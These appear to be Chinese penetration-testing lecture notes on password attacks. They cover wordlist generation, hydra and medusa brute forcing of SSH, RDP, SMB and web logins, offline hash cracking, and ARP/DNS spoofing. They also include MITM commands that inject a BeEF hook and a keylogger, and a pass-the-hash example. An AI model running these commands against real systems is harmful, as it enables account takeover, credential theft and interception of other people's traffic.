思路
目标系统实施了强安全措施
  – 安装了所有补丁
  – 无任何已知漏洞
  – 无应用层漏洞
  – 攻击面最小化
社会工程学
获取目标系统用户身份
  – 非授权用户不受信,认证用户可以访问守信资源
  – 已有用户账号权限受限,需要提权
  – 不会触发系统报警

身份认证方法
证明你是你声称你是的那个人
  – 你知道什么(账号密码、pin、passphrase)
  – 你有什么(令牌、token、key、证书、密宝、手机)
  – 你是谁(指纹、视网膜、虹膜、掌纹、声纹、面部识别)
  – 以上方法结合使用(多因素身份认证)
基于互联网的身份验证仍以账号密码为主要形式

密码破解方法
人工猜解
  – 垃圾桶工程
  – 被动信息收集
基于字典暴力破解(主流)
键盘空间字符暴破
字典
  – 保存有用户名和密码的文本文件
  – /usr/share/wordlist
  – /usr/share/wfuzz/wordlist
  – /usr/share/seclists

字典
键盘空间字符爆破
  – 全键盘空间字符
  – 部分键盘空间字符 (基于规则)
  – 数字、小写字母、大写字母、符号、空格、瑞典字符、高位ASCII码
crunch <min-len> <max-len> [<charset string>] [options]
  – <charset string> 默认是小写字符
crunch 6 6 0123456789 -o START -d 2 -b 1mb / -c 100
  – -b 按大小分割字典文件(kb/kib、mb/mib、gb/gib)
  – -c 每个字典的行数
  – 以上两个参数必须与-o START 结合使用
  – -d 同一字符连贯出现数量(11 / aaa)

字符集
  – crunch 4 4 -f /usr/share/crunch/charset.lst lalpha-sv -o 1.txt
无重复字符
  – crunch 1 1 -p 1234567890 | more
  – 必须是最后一个参数
  – 最大、最小字符长度失效,但必须存在
  – 与-s 参数不兼容(-s 指定起始字符串)
  – crunch 4 4 0123456789 -s 9990
读取文件中每行内容作为基本字符生成字典
  – crunch 1 1 -q read

字典组成规则
  – crunch 6 6 -t @,%%^^ | more
  – @:小写字母 lalpha
  – ,:大写字母 ualpha
  – %:数字 numeric
  – ^:符号 symbols
输出文件压缩
  – crunch 4 4 -t @,%^ -o 1.txt -z 7z
  – 其他压缩格式:gzip、bzip2、lzma
  – 7z压缩比率最大

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -o w.txt -t @d@@ -s cdab
crunch 4 5 -p dog cat bird
crunch 5 5 abc DEF + \!@# -t ,@^%,
  – + 占位符
  – \ 转义符(空格、符号)
crunch 5 5 -t ddd%% -p dog cat bird
  – 任何不同于-p 参数指定的值都是占位符
crunch 5 5 -d 2@ -t @@@%%

组合应用
  – crunch 2 4 0123456789 | aircrack-ng a.cap -e MyESSID -w -
  – crunch 10 10 12345 --stdout | airolib-ng testdb -import passwd -

按个人信息生成其专属的密码字典
CUPP:Common User Password Profiler
  – git clone https://github.com/Mebus/cupp.git
  – python cup.py -i

通过收集网站信息生成字典
cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt
  – -m:最小单词长度
  – -d:爬网深度
  – -e:收集包含email地址信息
  – -c:每个单词出现次数
  – 支持基本、摘要 身份认证
  – 支持代理

用户密码变型
  – 基于 cewl 的结果进行密码变型
  – 末尾增加数字串
  – 字母大小写变化
  – 字母与符号互相转换
  – 字母与数字互相转换
  – P@$$w0rd

使用 John the Ripper 配置文件实现密码动态变型
/etc/john/john.conf
  – [List.Rules:Wordlist]
  – $[0-9]$[0-9]$[0-9]
  – john --wordlist=cewl.txt --rules --stdout > m.txt
  – [List.Rules:test]
  $[0-9]$[0-9]$[0-9]$[a-zA-Z]
  $[0-9]$[0-9]$[0-9]$[a-zA-Z]$[a-zA-Z]$[a-zA-Z]$[`~!@#$%^&*()\-_=+]
  – john --wordlist=cewl.txt --rules=test --stdout > m.txt
  – john --wordlist=ahm.lst --rules=test HASHFILE

在线密码破解——hydra
Hydra
  – 九头蛇,砍去一个头即长出新头,后为大力神赫拉克勒斯所杀

Windows密码破解
  – hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vVd
  – hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV
Linux密码破解
  – hydra -l root -P pass.lst ssh://1.1.1.1 -vV
其他服务密码破解
  – hydra -L user.lst -P pass.lst ftp://1.1.1.1 -s 2121 -e nsr -o p.txt -t 64
图形化界面
  – xhydra

HTTP表单身份认证
  – hydra -l admin -P pass.lst 1.1.1.1 http-post-form    "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Lin:S=index.php" -V
  – hydra -l admin -P pass.lst 1.1.1.1 http-post-form    "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Lin:Login Failed" -V
  – /foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo
    C:先访问指定页面取得cookie
    H:指定http头
– https-post-form、http-get-form、https-get-form
– -S:使用SSL连接

pw-inspector
  – 按长度和字符集筛选字典
  – pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l
  – pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u
密码破解效率
  – 密码复杂度(字典命中率)
  – 带宽、协议、服务器性能、客户端性能
  – 锁定阈值
  – 单位时间最大登陆请求次数

在线密码破解——medusa

Hydra 的缺点
  – 稳定性差,程序时常崩溃
  – 速度控制不好,容易触发服务屏蔽或锁死机制
  – 每主机新建进程,每服务新建实例
  – 大量目标破解时性能差
Medusa 的特点
  – 稳定性好
  – 速度控制得当
  – 基于线程
  – 支持模块少于hydra(不支持RDP)
  – WEB-Form支持存在缺陷

medusa -d
破解windows密码
– medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F
破解Linux SSH密码
– medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns –F
其他服务密码破解
  – medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F
  – medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m     FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pass=password&Login=Login"

-n:非默认端口
-s:使用SSL连接
-T:并发主机数
medusa -M ftp -q

离线密码破解
身份认证
  – 禁止明文传输密码
  – 每次认证使用HASH算法加密密码传输(HASH算法加密容易、解密困难)
  – 服务器端用户数据库应加盐加密保存
破解思路
  – 嗅探获取密码HASH
  – 利用漏洞登陆服务器并从用户数据库获取密码HASH
  – 识别HASH类型
    长度、字符集
  – 利用离线破解工具碰撞密码HASH

优势
  – 离线不会触发密码锁定机制
  – 不会产生大量登陆失败日志引起管理员注意
HASH识别工具
  – hash‐identifier
  – Hashid
  – 可能识别错误或无法识别

Windows HASH获取工具
  – 利用漏洞:Pwdump、fgdump、 mimikatz、wce
  – 物理接触:samdump2
  – Kali ISO 启动虚拟机
  – mount /dev/sda1 /mnt
  – cd /mnt/Windows/System32/config
  – samdump2 SYSTEM SAM -o sam.hash
  – 利用nc传输HASH

Syskey工具
  – 使用Bootkey利用RC4算法加密SAM数据库
  – Bootkey保存于SYSTEM文件中
  – Bkhive
    从SYSTEM文件中提取bootkey
    Kali 2.0 抛弃了bkhive
    编译安装 :http://http.us.debian.org/debian/pool/main/b/bkhive/
    bkhive SYSTEM key
    samdump2 SAM key (版本已更新,不再支持此功能)
  – 建议使用 Kali 1.x

离线密码破解——Hashcat
开源多线程密码破解工具
支持80多种加密算法破解
基于CPU的计算能力破解
六种模式
  – 0 Straight:字典破解
  – 1 Combination:将字典中密码进行组合(1 2 > 11 22 12 21)
  – 2 Toggle case:尝试字典中所有密码的大小写字母组合
  – 3 Brute force:指定字符集(或全部字符集)所有组合
  – 4 Permutation:字典中密码的全部字符置换组合(12 21)
  – 5 Table-lookup:程序为字典中所有密码自动生成掩码

命令
  – hashcat -b
  – hashcat -m 100 hash.dump pass.lst
  – hashcat -m 0 hash.txt -a 3 ?l?l?l?l?l?l?l?l?d?d
  – 结果:hashcat.pot
  – hashcat -m 100 -a 3 hash -i --increment-min 6 --increment-max  8 ?l?l?l?l?l?l?l?l
  – ?l = abcdefghijklmnopqrstuvwxyz
  – ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
  – ?d = 0123456789
  – ?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  – ?a = ?l?u?d?s
  – ?b = 0x00 - 0xff

离线密码破解——oclhashcat
号称世界上最快、唯一的基于GPGPU的密码破解软件
免费开源、支持多平台、支持分布式、150+hash算法
硬件支持
  – 虚拟机中无法使用
  – 支持 CUDA 技术的Nvidia显卡
  – 支持 OpenCL 技术的AMD显卡
  – 安装相应的驱动
限制
  – 最大密码长度 55 字符
  – 使用Unicode的最大密码长度 27 字符

关于版本
  – oclHashcat-plus、oclHashcat-lite已经合并为oclhashcat
命令
  – oclHashcat -m 0 hash.txt -a 3 ?a?a?a?a?a?a?a
  – ?l = abcdefghijklmnopqrstuvwxyz
  – ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
  – ?d = 0123456789
  – ?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  – ?a = ?l?u?d?s
  – ?b = 0x00 - 0xff

离线密码破解——RainbowCrack
基于时间记忆权衡技术生成彩虹表
提前计算密码的HASH值,通过比对HASH值破解密码
计算HASH的速度很慢,修改版支持CUDA GPU
  – https://www.freerainbowtables.com/en/download/
KALI 中包含的RainbowCrack工具
  – rtgen:预计算,生成彩虹表,耗时的阶段
  – rtsort:对rtgen生成的彩虹表进行排序
  – rcrack:查找彩虹表破解密码
  – 以上命令必须顺序使用

彩虹表
  – 密码明文、HASH值、HASH算法、字符集、明文长度范围
rtgen
  – LanMan、NTLM、MD2、MD4、MD5、SHA1、RIPEMD160
  – rtgen md5 loweralpha 1 5 0 10000 10000 0
  – 计算彩虹表时间可能很长
下载彩虹表
  – http://www.freerainbowtables.com/en/tables/
  – http://rainbowtables.shmoo.com/

彩虹表排序
  – /usr/share/rainbowcrack
  – rtsort /md5_loweralpha#1-5_0_1000x1000_0.rt
密码破解
  – rcrack *.rt -h 5d41402abc4b2a76b9719d911017c592  
  – rcrack *.rt -l hash.txt

离线密码破解——John
支持众多服务应用的加密破解
  – john --list=formats
支持某些对称加密算法破解
模式
  – Wordlist:基于规则的字典破解
  – Single crack:默认被首先执行,使用Login/GECOS信息尝试破解
  – Incremental:所有或指定字符集的暴力破解
  – External:需要在主配配文件中用C语言子集编程

默认破解模式
  – Single、wordlist、incremental
  – 主配置文件中指定默认wordlist


破解Linux系统账号密码
  – unshadow /etc/passwd /etc/shadow > pass.txt
  – john pass.txt
  – john --show pass

破解windows密码
  – john sam.dump --wordlist=password.lst --format=nt
  – john sam.dump --format=nt --show
Johnny 图形化界面的john

离线密码破解——Ophcrack
  基于彩虹表的LM、NTLM密码破解软件
  彩虹表:http://ophcrack.sourceforge.net/tables.php

在线密码破解

密码嗅探
二、三层地址
  – IP 网络到网络
  – MAC 主机到主机
交换机与HUB
  – HUB全端口转发
  – 交换机根据学习地址转发
  – 混杂模式抓包

ARP协议
  – 免费ARP
  – 基于广播学习
  – 以太网头、ARP头
  – 请求、响应相对独立
  – 基于传闻的协议

手动修改数据包实现ARP欺骗
arpspoof
  – echo 1 > /proc/sys/net/ipv4/ip_forward
  – arpspoof -t 1.1.1.12 -r 1.1.1.1
网络嗅探
  – driftnet -i eth0 -a -d tempdir -s
  – dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts
  – urlsnarf -i eth0
  – webspy -i eth0 1.1.1.10
  – dsniff -i eth0 -m
    /usr/share/dsniff/dsniff.services

DNS欺骗代理
– dnschef --fakeip=1.1.1.10 --fakedomains=www.google.com,www.youtube.com --interface 1.1.1.2   -q
将被害者DNS指向伪造的DNS服务器

中间人攻击
注入XSS
  – 即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码
  – 一旦得手,影响范围巨大
  – 如果中间人发生在运营商线路上,很难引起用户注意
Mitmf 安装
  – 曾经号称最好用的中间人攻击工具(kali 2.0后默认未安装)
  – apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3  libcapstone-dev libffi-dev file
  – apt-get install mitmf
  – pip uninstall twisted
  – wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
  – pip install ./Twisted-15.5.0.tar.bz2

启动beef
  – cd /usr/share/beef-xss/
  – ./beef
mitmf中间人注入xss脚本
  – mitmf --spoof --arp -i eth0 --gateway 1.1.1.1 --target 1.1.1.2 --inject
  --js-url http://1.1.1.3:3000/hook.js
  – mitmf --spoof --arp -i eth0 --gateway 192.168.20.2 --target   192.168.20.1 --jskeylogger
  – --upsidedownternet、--screen(/var/log/mitmf)
  – --ferretng(cookie)、--browserprofiler(浏览器及插件信息)
  – --smbtrap、--smbauth(不演示)

--hsts
  – HTTP Strict Transport Security
  – 防止协议降级、cookie窃取
  – 安全策略通过HTTP响应头”Strict-Transport-Security“实施
  – 限制user-agent、https等

--filepwn
  – 凌空插后门

Ettercap
  – 统一的中间人攻击工具
  – 转发MAC与本机相同,但IP与本机不同的数据包
  – 支持SSH1、SSL中间人攻击
模块划分
  – Snifer
  – MITM
  – Filter
  – Log
  – Plugin

Snifer
  – 负责数据包转发
  – Unified
    单网卡情况下独立完成三层包转发
    始终禁用内核IP_Forward功能
  – Bridge
    双网卡情况下的一层MITM模式
    可作为IPS过滤数据包
    不可在网关上使用(透明网桥)
MITM
  – 把流量重定向到ettercap主机上
  – 可以使用其他工具实现MITM,ettercap之作嗅探和过滤使用

实现MITM的方法
  – ARP
  – ICMP
    ICMP路由重定向,半双工
  – DHCP

    修改网关地址,半双工
  – Switch Port Stealing
    flood目标地址是本机,源地址是受害者的包
    适用于ARP静态绑定的环境
  – NDP
    IPv6协议欺骗技术

2.4以上内核对ARP地址欺骗的约束
  – 收到非请求的ARP响应包,不更新本地ARP缓存
  – Ettercap使用ARP request包进行攻击
Solaris 不根据ARP包更新本地ARP缓存
  – Ettercap使用先发ICMP包来更新ARP缓存

用户操作界面
  – -T 文本界面
  – -G 图形界面
  – -C 基于文本的图形界面
  – -D 后台模式
指定目标
  – IPv4:MAC/IPs/Ports
  – IPv6:MAC/IPs/IPv6/Ports
  – /10.0.0.1−5;10.0.1.33/20−25,80,110

权限
  – 需要root权限打开链路层Socket连接,然后使用nobody账号运行
  – 日志写入目录需要nobody有写入权
  – 修改etter.conf:EC_UID=65534
基于伪造证书的SSL MITIM
  – Bridge模式不支持SSL MITM
  – openssl genrsa −out etter.ssl.crt 1024
  – openssl req −new−keyetter.ssl.crt −out tmp.csr
  – openssl x509 −req −days 1825 −in tmp.csr −signkey etter.ssl.crt
  −out tmp.new
  – cat tmp.new>>etter.ssl.crt
  – rm −f tmp.newtmp.csr

ARP MITM
字符模式
  – ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.2// -F 1.ef -P   autoadd -w a.cap -l loginfo -L logall -m message
图形界面
SSL MITM
  – vi /etc/ettercap/etter.conf
DNS欺骗
  – dns_spoof插件配置文件
  – vi /etc/ettercap/etter.dns

Ettercap 日志查看
  – etterlog -p log.eci 查看获取的密码
  – etterlog -c log.ecp 列出Log中的连接
  – etterlog -c -f /1.1.1.1/ log.ecp
  – etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa        选择相应的连接并榨取文件

Filter
  – /usr/share/ettercap/
SSH-2.xx / SSH-1.99 / SSH-1.51
  – etterfilter etter.filter.ssh -o ssh.ef
替换HTTP内容
  – if (ip.proto == TCP && tcp.src == 80) {
  – msg("data on TCP 80\n");
  – replace("img src=", "img src=\"http://1.1.1.1/1.gif\" ");
  – replace("IMG src=", "img src=\"http://1.1.1.1/1.gif\" ");
  – replace("IMG SRC=", "img src=\"http://1.1.1.1/1.gif\" ");
  – }

ICMP
  – -M icmp:00:11:22:33:44:55/10.0.0.1(真实网关的MAC/IP)
DHCP
  – −M dhcp:192.168.0.30,35,50−60/255.255.255.0/192.168.0.1(DNS)
Port
  – -M port /1.1.1.1/ /1.1.1.2/
Ndp
  – -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/

Pass the Hash (PTH)
密码破解耗费时间资源巨大
使用密文提交给服务器直接完成身份认证
NTLM/LM是没有加盐的静态HASH密文
企业中使用ghost等工具克隆安装系统
pth-winexe -U  w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8 //1.1.1.1 cmd

转载于:https://www.cnblogs.com/steven9898/p/11492373.html

第十三章 密码破解相关推荐

  1. 第六章:密码破解系统修复

    第六章:密码破解&系统修复 1.密码破解 实际生产环境中,会遇到root密码破解的问题,如管理员离职,没有交接到位.密码设置过于复杂,忘记了等等.下面,我们就来介绍如何在RHEL7中破解roo ...

  2. Python绝技第一章 入门 python3实现密码破解

    前言 对我而言,武术的非凡之处在于它的简单.简单的方法也是正确的方法,同时武术也没有什么特别之处.越接近武术的真谛,招式表现上浪费越少 简介 python 绝技 第一章是python入门语法,两个需要 ...

  3. ***后门与密码破解

    第3章-***后门与密码破解 一.***后门介绍 (1).常见的***种类 1.远程控制*** Ø远程控制***是数量多.危害最大.知名度最高的一种***,它可以得到被感染计算机的私密信息,访问任意文 ...

  4. 第十三章 数据库支持

    第十三章 数据库支持 本章讨论Python数据库API(一种连接到SQL数据库的标准化方式),并演示如何使用这个API来执行一些基本的SQL.最后,本章将讨论其他一些数据库技术. 关Python支持的 ...

  5. 第五——十三章的作业

    第五章 1.团队模式和团队的开发模式有什么关系? 答:团队模式指团队的分工模式,团队内部的结构,团队开发模式指团队开发的流程及步骤 2.如果你领头开展一个全新的项目,你要怎么选择"合适&qu ...

  6. 《深入理解 Spring Cloud 与微服务构建》第十三章 配置中心 Spring Cloud Config

    <深入理解 Spring Cloud 与微服务构建>第十三章 配置中心 Spring Cloud Config 文章目录 <深入理解 Spring Cloud 与微服务构建>第 ...

  7. Linux操作系统的密码破解大全

    来源:CHINAITLAB (一)Linux 系统密码破解 1.在grub选项菜单按E进入编辑模式 2.编辑kernel那行 /init 1 (或/single) 3.按B重启 4.进入后执行下列命令 ...

  8. 高级shell编程笔记(第十三章 系统与管理命令)

    第十三章 系统与管理命令 在/etc/rc.d 目录中的启动和关机脚本中包含了好多有用的(和没用的)这些系统管理命令.这些命令通常总是被 root 用户使用,用与系统维护或者是紧急文件系统修复.一定要 ...

  9. 系统安全和应用及实验部分(弱口令扫描、密码破解、NMAP嗅探)

    文章目录 一.账号安全控制 1.基本安全措施 (1)系统账号的清理 (2)密码安全控制 (3)历史命令.自动注销 二.用户切换.提权 1.用户切换 2. 提升执行权限 三.PAM安全认证 1.PAM认 ...

最新文章

  1. flush python_带有示例的Python File flush()方法
  2. java对list里面按照分数排名_提前批警校排名,部属警校去省厅,省级警校去乡镇吗...
  3. Android 系统(89)---ART
  4. php读取剪贴板内容,js如何处理剪贴板的内容?js处理剪贴板的内容的方法
  5. (四)洞悉linux下的Netfilteramp;iptables:包过滤子系统iptable_filter
  6. 面向法务编程|如何对接支付宝新产品满足法务要求:助力法务反洗钱反诈骗
  7. 乐优商场项目day08——图片(文件)上传
  8. 0基础学RS(二十五)思科OSPF配置
  9. 音频剪辑软件哪个好用
  10. 邮件服务器163.com,163免费邮
  11. anaconda3里pkgs可以删除吗,我试过conda clean -a,但用完之后还有10个G,吐血,C盘没空间了,pkgs删除影响虚拟环境吗,毕竟base大多数人用不到啊,求教
  12. uva 1645 count 水题
  13. Java基础重温_06:Debug模式(打断点、下一步),基础练习案例(减肥计划if,switch版本、逢七跳过、不死神兔、百钱白鸡、数组元素(求和,索引位置,反转)、判断数组是否相同、评委打分)
  14. 换发型算法_【AI超级美发师】深度学习算法打造染发特效(附代码)
  15. c# http put请求 通用http请求 post get put
  16. QT自动适配高分屏的解决方案
  17. Qt5 学习之路及嵌入式开发教程4:代码编写实现信号槽例子
  18. Suggestion: use tools:overrideLibrary
  19. 关于Altium designer中45°、90°及圆弧线的切换
  20. ASEMI二极管A7参数,A7二极管规格书,A7二极管的封装

热门文章

  1. JavaFX + MySQL 学校管理系统
  2. C#实现DXF文件读取写入
  3. s1.1024gc.net/bbs/index.php,1.12.2游戏崩溃/_ \,那位大神解答一下
  4. Chapter 10 - Surface Shading (fundamentals-of-computer-graphics-4th)
  5. 弥合鸿沟:一种生成内部威胁数据的实用方法(Bridging the Gap: A Pragmatic Approach to Generating Insider Threat Data )
  6. android项目实战课程扣丁音乐已杀青预计本月上线
  7. 华为云FusionInsight连续三次获得第一,加速释放数据要素价值
  8. MPP VS HADOOP场景分析
  9. 江南天安基于国产密码构建ChinaDRM证书分发云服务
  10. 华为平板M3能用鸿蒙吗,三步即完成操作 华为平板 M3就是这么爽